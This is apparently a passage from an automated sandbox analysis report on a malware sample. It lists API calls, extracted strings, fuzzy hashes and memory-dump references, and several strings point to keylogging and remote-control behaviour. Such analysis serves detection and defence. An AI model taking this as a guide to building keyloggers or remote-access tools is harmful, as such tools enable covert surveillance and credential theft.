                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: >G
                                                  • API String ID: 180926312-1296849874
                                                  • Opcode ID: fe08d4ec2e71245ba591ef012b25d98d9fbbdaf0f8974ced9bfb59050c4c653b
                                                  • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                  • Opcode Fuzzy Hash: fe08d4ec2e71245ba591ef012b25d98d9fbbdaf0f8974ced9bfb59050c4c653b
                                                  • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                  APIs
                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID: $fD
                                                  • API String ID: 1807457897-3092946448
                                                  • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                  • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                  • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                  • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 02127D1A
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 02127DD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3480331319-1018135373
                                                  • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                  • Instruction ID: d2a14df90e1c34b1c7064ca59fe7d6c350c405fccd8b54ad0b6ae748ad9a09c7
                                                  • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                  • Instruction Fuzzy Hash: ED419230A402699FCB14EF68C844AAFBBB5FF45328F148165F8155B2D1D732D92ACB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LG$XG
                                                  • API String ID: 0-1482930923
                                                  • Opcode ID: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
                                                  • Instruction ID: 949f34c0c080b0e9582e2a94a3a75ffc6d8ef452b8d96103084aad81928a028a
                                                  • Opcode Fuzzy Hash: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
                                                  • Instruction Fuzzy Hash: F3312731E807149EDF25DF68984079D77A2DB41324F1081AAFC36FB2D0D378D6488B98
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                    • Part of subcall function 004177A2: 70142440.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                    • Part of subcall function 00417815: 7015EFB0.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                    • Part of subcall function 004177C5: 70165080.GDIPLUS(?,00417CCC), ref: 004177CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream$70142440701570165080
                                                  • String ID: image/jpeg
                                                  • API String ID: 1403305975-3785015651
                                                  • Opcode ID: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                  • Opcode Fuzzy Hash: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02107E6F
                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 02107EBC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream
                                                  • String ID: image/jpeg
                                                  • API String ID: 1369699375-3785015651
                                                  • Opcode ID: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction ID: 3aed70da93cf067ac781eda2899bbe8257dd0fa0fc29bc6940fdd0ad1b473b8d
                                                  • Opcode Fuzzy Hash: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction Fuzzy Hash: 36312A76504310AFC311AF64CC84DAFBBE9FF8A704F00095DFA4597251DB75AA099BA2
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 020F3C91
                                                    • Part of subcall function 0210AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,020F3CA7), ref: 0210ADC6
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32(020F3D20,?,?,020F3D20,00465324), ref: 02107933
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32($SF,?,?,020F3D20,00465324), ref: 0210793C
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • Sleep.KERNEL32(000000FA,00465324), ref: 020F3D63
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: 8>G
                                                  • API String ID: 368326130-2084872820
                                                  • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                  • Instruction ID: 4e9a51ef6b9053c922374b740eb754c955f20b04745fed0df0ee16648f1723d9
                                                  • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                  • Instruction Fuzzy Hash: 69315432A803145FDB98FB74EC95AEE7777AF80310F0000A9EA06679D5EF605A4ADE51
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02140DA0,?,00000050,?,?,?,?,?), ref: 02140C20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction ID: 1d4f113e91635e0a5f01af476fb410b66b652797606aaa577a9335d447ffa596
                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction Fuzzy Hash: 7221D666AC0104AAE73C9F66C900B977396EF4CB69F568468EB0DD7104FF32DA45C398
                                                  APIs
                                                    • Part of subcall function 02123780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 0212378B
                                                    • Part of subcall function 02123780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 021237C8
                                                    • Part of subcall function 02123B0C: __onexit.LIBCMT ref: 02123B12
                                                  • __Init_thread_footer.LIBCMT ref: 020FB10E
                                                    • Part of subcall function 02123736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 02123740
                                                    • Part of subcall function 02123736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 02123773
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                  • String ID: ,]G$0]G
                                                  • API String ID: 2974294136-589576501
                                                  • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                  • Instruction ID: 96e52a0375c52685cc0f8317bd777ebfcec98ef3a39b5dd8d351323c003c8872
                                                  • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                  • Instruction Fuzzy Hash: 7C21D531A803189FCB94FBB4D890EED7377AF54314F50402ADA016B995EF246E4ADE94
                                                  APIs
                                                    • Part of subcall function 0210277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0210279E
                                                    • Part of subcall function 0210277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 021027BB
                                                    • Part of subcall function 0210277A: RegCloseKey.ADVAPI32(?), ref: 021027C6
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 020FB9D3
                                                  • PathFileExistsA.SHLWAPI(?), ref: 020FB9E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: TUF
                                                  • API String ID: 1133728706-3431404234
                                                  • Opcode ID: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                  • Instruction ID: f988e32e71e0e9d98c579a67d2511e03267cb9e7541bbdd0d4a9904542433c80
                                                  • Opcode Fuzzy Hash: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                  • Instruction Fuzzy Hash: 6221A231AC03086ACB84F7F0CC56DEE776A6F54304F4400699F0267984EF659A09DED6
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                    • Part of subcall function 004177A2: 70142440.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                    • Part of subcall function 00417815: 7015EFB0.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                    • Part of subcall function 004177C5: 70165080.GDIPLUS(?,00417CCC), ref: 004177CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream$70142440701570165080
                                                  • String ID: image/png
                                                  • API String ID: 1403305975-2966254431
                                                  • Opcode ID: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                  • Opcode Fuzzy Hash: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02107F5B
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 02107F80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream
                                                  • String ID: image/png
                                                  • API String ID: 1369699375-2966254431
                                                  • Opcode ID: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction ID: 77d09d5054fb164c97dd1308bfb51b5a24c292347147111afd3b420d87a3723e
                                                  • Opcode Fuzzy Hash: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction Fuzzy Hash: F6219335240211AFC711EF64CC84CAFBBAEEF8A750F10051DFA0683161DF75AA46DBA2
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 8254ee6c89dc903dda6a8d7813d3c868a55be3ea6077d5cb98a17130acada49a
                                                  • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                  • Opcode Fuzzy Hash: 8254ee6c89dc903dda6a8d7813d3c868a55be3ea6077d5cb98a17130acada49a
                                                  • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 020F4C58
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • GetLocalTime.KERNEL32(?), ref: 020F4CB5
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 020F4C4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                  • Instruction ID: 2a11d003e33d2f249c22f5e460e0240d97def01bcddf206a0ad9104b98e13c89
                                                  • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                  • Instruction Fuzzy Hash: E2218B71A843406FD391F728DC047AF7BD56BD1305F440069EF0903AA1EB68518D9BAF
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                  • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                  • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                  • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                  APIs
                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 020F6A9C
                                                    • Part of subcall function 020F69CB: _wcslen.LIBCMT ref: 020F69EF
                                                    • Part of subcall function 020F69CB: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 020F6A50
                                                  • CoUninitialize.COMBASE ref: 020F6AF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                  • API String ID: 3851391207-2322451727
                                                  • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction ID: 0f7310af1fcef1b69cc65c301d031644db8946e1390dd6a83eeed6fad373d40a
                                                  • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction Fuzzy Hash: 2D01F5723843116BE2A56B21DC4DF7B779CDF41725F21012EFA1087880EFA2DC405A62
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 02102879
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 021028AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID: TUF
                                                  • API String ID: 3660427363-3431404234
                                                  • Opcode ID: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                  • Instruction ID: c10d8b68ad31691784dbd8b6d51d76d2aa369d62c9e0726c45f309d1232f5aa8
                                                  • Opcode Fuzzy Hash: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                  • Instruction Fuzzy Hash: 1C014FB6A00118BFEB059B94DC49EFE7ABEEF48251F10007AF901E2140E7B59F049A64
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$xIG
                                                  • API String ID: 1174141254-4080756945
                                                  • Opcode ID: 921cd58e83faa7af039f32711b20a7e0c911bd48adcaaaa2b4b8115cf6e5031b
                                                  • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                  • Opcode Fuzzy Hash: 921cd58e83faa7af039f32711b20a7e0c911bd48adcaaaa2b4b8115cf6e5031b
                                                  • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0210A115
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: TUF$xIG
                                                  • API String ID: 1174141254-2109147017
                                                  • Opcode ID: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                  • Instruction ID: 77f1f027222309bf2ec379551f326276d8f5f32ce19bda61d2cbbcfc4c8cbf21
                                                  • Opcode Fuzzy Hash: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                  • Instruction Fuzzy Hash: 780128213C83015BC658F670C895AEE3B435F80740F00402ADFAA47AE5EFB09D45EB9B
                                                  APIs
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                  • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: 53ce75cdc14a818cd757adc839ea4e3ac29fb9721298e96b2c089af624b24c59
                                                  • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                  • Opcode Fuzzy Hash: 53ce75cdc14a818cd757adc839ea4e3ac29fb9721298e96b2c089af624b24c59
                                                  • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                  APIs
                                                    • Part of subcall function 020FAADD: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 020FAAEB
                                                    • Part of subcall function 020FAADD: wsprintfW.USER32 ref: 020FAB6C
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • CloseHandle.KERNEL32(?), ref: 020FAA31
                                                  • UnhookWindowsHookEx.USER32 ref: 020FAA44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                  • Instruction ID: 3d38a981a910a26303e53c1fcd03310bbdf28996c34676b571723c6ae2b88a38
                                                  • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                  • Instruction Fuzzy Hash: 7B014C30BC43009FCB527724C8067FD7BB26F41300F40049DDB4202D96EBA15449EBEA
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$j=D
                                                  • API String ID: 1901932003-3128777819
                                                  • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
